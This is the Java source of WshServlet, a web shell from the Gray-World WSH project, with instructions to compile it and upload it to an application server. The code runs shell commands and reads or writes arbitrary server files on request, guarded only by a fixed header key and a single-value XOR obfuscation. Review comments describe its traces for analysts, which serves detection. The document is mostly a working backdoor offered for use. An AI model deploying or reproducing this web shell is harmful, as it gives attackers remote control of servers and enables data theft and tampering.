
📄 wshservlet.java

📁 Wsh, "Web Shell" - 远程控制UNIX/WIN SHELL
/*******************************************************************************
** WshServlet.java - WebShell Server Java servlet version - v1.0              **
** Copyright (C) 2004 Simon Castro - <scastro [at] entreelibre.com>           **
**                                                                            **
**   This file is part of WSH v2.2.0 - WebShell v2.2.0 - (C) Alex Dyatlov and **
** Simon Castro - and is part of the Gray-World Team projects.  Visit  us  on **
** http://www.gray-world.net or send a mail to <team [at] gray-world.net>.    **
**                                                                            **
**   WshServlet.java is free software; you can redistribute it and/or  modify **
** it under the terms of the GNU General Public License as published  by  the **
** Free Software Foundation; either version 2 of the  License,  or  (at  your **
** option) any later version.                                                 **
**                                                                            **
**   WshServlet.java is distributed in the hope that it will be  useful,  but **
** WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY **
** or FITNESS FOR A PARTICULAR PURPOSE. See the GNU  General  Public  License **
** for more details.                                                          **
**                                                                            **
**   You should have received a copy of the GNU General Public License  along **
** with this file; if not, write to the Free Software  Foundation,  Inc.,  59 **
** Temple Place, Suite 330, Boston, MA 02111-1307 USA                         **
*******************************************************************************/

/*******************************************************************************
**                     COMPILATION AND SETUP INFOS                            **
**                                                                            **
**   Have a look and change the CONFIGURATION part, then  build  the  servlet **
** using 'javac -classpath path_to_lib/j2ee.jar WshServlet.java'  and  upload **
** it under a servlet executable location such as  ...installedApps/nodename/ **
** DefaultApplication.ear/DefaultWebApplication.war/  for  an  IBM  Websphere **
** Application Server. You'll then be able to reach  the  servlet  using  the **
** "/servlet/WshServlet/" URI.                                                **
**                                                                            **
**   Special thanks to DDesch for his icq online support ;)                   **
*******************************************************************************/

import java.io.*;
import java.util.*;
import javax.servlet.*;
import javax.servlet.http.*;

/*
** WshServlet - HTTP POST handler that exposes three server-side operations
** behind one shared key: shell command execution, file read and file write.
**
** Request handling as implemented below:
**   - the request header named by Param_XKEY must equal Conf_XPASS, otherwise
**     doPost returns without writing anything to the response;
**   - a request without a Content-Type header is dropped the same way;
**   - when neither the Param_FILEGET nor the Param_FILEPUT header is present,
**     the first line of the request body is run through Conf_SHELL with
**     Conf_SHELL_ARG and the command's standard output is sent back;
**   - a Param_FILEGET header names a server-side file that is streamed back;
**   - a Param_FILEPUT header names a server-side path the body is written to.
** When Conf_XORED is 1, the command, its output and the transferred file
** contents are XORed with the single constant Conf_XORVAL.
**
** NOTE(review), for analysts who find this class on an application server:
**   - The only access control is string equality against the compile-time
**     constant Conf_XPASS; there is no per-user identity, session or logging
**     anywhere in this class.
**   - The XOR step uses one fixed value, so a captured request or response
**     body is decoded by XORing each character with Conf_XORVAL again
**     (85 as shipped). It hides content from plain-text inspection only.
**   - Observable traces implied by the code: POST requests carrying the
**     headers named in Param_*, "text/html" responses, and the servlet
**     container spawning Conf_SHELL with Conf_SHELL_ARG as a child process.
**   - File paths come straight from a request header and are handed to
**     FileInputStream / FileOutputStream unchanged, so reads and writes are
**     limited only by the OS permissions of the servlet container's account.
*/
public final class WshServlet extends HttpServlet {

    /******************
    ** CONFIGURATION **
    ******************/

    // Password Key: the value the Param_XKEY request header is compared with.
    private final String Conf_XPASS = "KEY";

    // Xor value
    private final char Conf_XORED = 1; // 0: disabled - 1: enabled
    private final char Conf_XORVAL = 85; // single constant XORed into every char

    // Shell execution parameters for *Nix
    private final String Conf_SHELL="/bin/sh";
    private final String Conf_SHELL_ARG="-c";

    // Shell execution parameters for Win32
    // private final String Conf_SHELL="c:\\winnt\\system32\\cmd.exe";
    // private final String Conf_SHELL_ARG="/C";

    /**********************
    ** END CONFIGURATION **
    **********************/

    // Names passed verbatim to HttpServletRequest.getHeader().
    // NOTE(review): these look like CGI environment-variable names (the comment
    // in doPost speaks of an "X-Key header"); as written, getHeader() is asked
    // for a header literally called "HTTP_X_KEY" etc. - confirm against
    // captured traffic which name appears on the wire.
    private final String Param_XKEY = "HTTP_X_KEY";
    private final String Param_FILEGET = "HTTP_X_FILEGET";
    private final String Param_FILEPUT = "HTTP_X_FILEPUT";

    /*********
    ** MAIN **
    *********/

    /*
    ** Entry point for POST requests: checks the key header, then dispatches
    ** to command execution, file download or file upload.
    **
    ** Dispatch order: the FILEGET header is tested first; because of the
    ** short-circuit &&, FILEPUT is only read when FILEGET is absent, so a
    ** request carrying both headers is treated as a download.
    ** The int results of the go_for_* helpers are ignored.
    */
    public final void doPost (HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException
    {
        String fileget = null, fileput = null;
        ServletOutputStream out;

        if (check_XKEY(req) != 0) // First check password in X-Key header
            return;

        if (req.getContentType() == null) // Exit if no content-type header
            return;

        res.setContentType("text/html"); // Tell we're going to process the request

        try
            {
                out = res.getOutputStream();

                if ((fileget = req.getHeader(Param_FILEGET)) == null &&
                    (fileput = req.getHeader(Param_FILEPUT)) == null) {
                    go_for_exec(req,out);
                } else {
                    if (fileget != null) {
                        go_for_download(fileget,out);
                    } else {
                        go_for_upload(req,fileput,out);
                    }
                }
            }
        catch (IOException e)
            {
                return;
            }
        finally
            {
                // don't do nothing just like the other versions...
                // A return inside finally also discards any exception that is
                // still propagating out of the try block, so failures here are
                // silent to the container.
                return;
            }
    }

    /**************
    ** FUNCTIONS **
    **************/

    /*
    ** Check the HTTP_X_KEY field
    **
    ** Returns 0 when the header named by Param_XKEY is present and
    ** compareTo() reports it equal to Conf_XPASS; returns -1 when the header
    ** is missing or differs.
    */
    private final int check_XKEY (HttpServletRequest req)
    {
        String KEY;

        if ((KEY = req.getHeader(Param_XKEY)) != null) {
            if (KEY.compareTo(Conf_XPASS) == 0) {
                return (0);
            }
        }
        return (-1);
    }

    /*
    ** Xor string or char
    **
    ** xor_that_char: returns chr XORed with Conf_XORVAL when Conf_XORED is 1,
    ** otherwise returns chr unchanged.
    */
    private final char xor_that_char (char chr)
    {
        if (Conf_XORED == 1) {
            return ((char) (chr ^ Conf_XORVAL));
        }
        return (chr);
    }

    /*
    ** xor_that_string: returns str with every char XORed with Conf_XORVAL
    ** when Conf_XORED is 1, otherwise returns str unchanged. Applying it
    ** twice gives back the input, which is why the same routine is used on
    ** the incoming command and on the outgoing output.
    ** Returns null only if building the new String throws
    ** NullPointerException; note that str.toCharArray() sits outside that
    ** try block.
    */
    private final String xor_that_string (String str)
    {
        if (Conf_XORED == 1) {
            char[] to_xor = str.toCharArray();
            for (int i=0; i < to_xor.length; i++) {
                to_xor[i] = (char) (to_xor[i] ^ Conf_XORVAL);
            }
            try // The caller checks for null
                {
                    str = new String(to_xor);
                }
            catch (NullPointerException n)
                {
                    return (null);
                }

        }
        return (str);
    }

    /*
    ** Call the shell and execute command
    **
    ** Reads ONE line from the request body, XOR-decodes it and passes it as
    ** the last element of { Conf_SHELL, Conf_SHELL_ARG, <line> } to
    ** Runtime.exec(). Each line of the process's standard output gets '\n'
    ** appended, is XOR-encoded and printed to out. Only getInputStream() is
    ** read; the error stream is not consumed and the process is not waited
    ** for.
    **
    ** Return value: -1 when the body cannot be read, is empty, or decoding
    ** yields null. Once the second try block is entered, the return (0) in
    ** its finally clause overrides the -1 returned from the loop or the
    ** catch, so the method then always returns 0.
    */
    private final int go_for_exec(HttpServletRequest req, ServletOutputStream out) throws IOException
    {
        String tmp = null;
        Process p = null;

        try
            {
                BufferedReader http_body = new BufferedReader(req.getReader());

                // don't care about CRLF just like other languages versions...
                tmp = http_body.readLine();
                if (http_body != null) http_body.close();

                if (tmp == null) return (-1); // No command ?

                // Check if XorEncoded flag is on and do the job
                if ((tmp = xor_that_string(tmp)) == null) // what is going on?
                    return (-1);
            }
        catch (IOException e)
            {
                return (-1);
            }

        BufferedReader exec_cmd = null;
        try
            {
                Runtime r = Runtime.getRuntime();
                // The decoded request line is the shell's command string.
                String cmd[] = { Conf_SHELL , Conf_SHELL_ARG , tmp};
                p = r.exec(cmd,null);
                exec_cmd = new BufferedReader(new InputStreamReader(p.getInputStream()));
                tmp=null;
                while ((tmp = exec_cmd.readLine()) != null) {

                    // readLine() strips the terminator; re-add it before encoding
                    tmp = tmp+'\n';
                    // Check if XorEncoded flag is on and do the job
                    if ((tmp = xor_that_string(tmp)) == null) { // what is going on?
                        if (exec_cmd != null) exec_cmd.close();
                        return (-1); 
                    }

                    out.print(tmp);
                }
            }
        catch (Exception e)
            {
                if (exec_cmd != null) exec_cmd.close();
                return (-1);
            }
        finally
            {
                if (exec_cmd != null) exec_cmd.close();
                return (0); // overrides any value returned above
            }
    }

    /*
    ** Download a file
    **
    ** Opens the path given in Fileget (taken from the request header by the
    ** caller, with no further checks here), reads it one byte at a time,
    ** passes each value through xor_that_char and prints it to out as a char.
    ** The return (0) in finally overrides the -1 from the catch, so the
    ** method returns 0 whether or not the file could be opened or read.
    */
    private final int go_for_download(String Fileget, ServletOutputStream out) throws IOException
    {
        int ch;
        InputStream istream = null;

        try 
            {
                istream = new BufferedInputStream(new FileInputStream(Fileget));
                while ((ch = istream.read()) != -1) {
                    ch = xor_that_char((char) ch);
                    out.print((char)ch);
                }
            }
        catch (Exception e)
            {
                if (istream != null) istream.close();
                return (-1);
            }
        finally 
            {
                if (istream != null) istream.close();
                return (0); // overrides the -1 from the catch block
            }
    }

    /*
    ** Upload a file
    **
    ** Writes the request body to the path given in Fileput (taken from the
    ** request header by the caller, with no further checks here). The file
    ** is opened with the one-argument FileOutputStream constructor, i.e. not
    ** in append mode. Each byte read from the request is passed through
    ** xor_that_char before being written. The out parameter is not used.
    **
    ** Returns -1 when getContentLength() is below 1; otherwise the
    ** return (0) in finally overrides the -1 from the catch, so the method
    ** returns 0 whether or not the write succeeded.
    */
    private final int go_for_upload(HttpServletRequest req, String Fileput, ServletOutputStream out) throws IOException
    {
        int ch;
        InputStream istream = null;
        OutputStream ostream = null;

        // Is there any data supplied in the body ?
        if (req.getContentLength() < 1) return (-1);

        try
            {
                ostream = new BufferedOutputStream(new FileOutputStream(Fileput));
                istream = new BufferedInputStream(req.getInputStream());
                while ((ch = istream.read()) != -1) {
                    ch = xor_that_char((char) ch);
                    ostream.write(ch);
                }
            }
        catch (Exception e)
            {
                if (istream != null) istream.close();
                if (ostream != null) {
                    ostream.flush();
                    ostream.close();
                }
                return (-1);
            }
        finally
            {
                if (istream != null) istream.close();
                if (ostream != null) {
                    ostream.flush();
                    ostream.close();
                }
                return (0); // overrides the -1 from the catch block
            }
    }
}
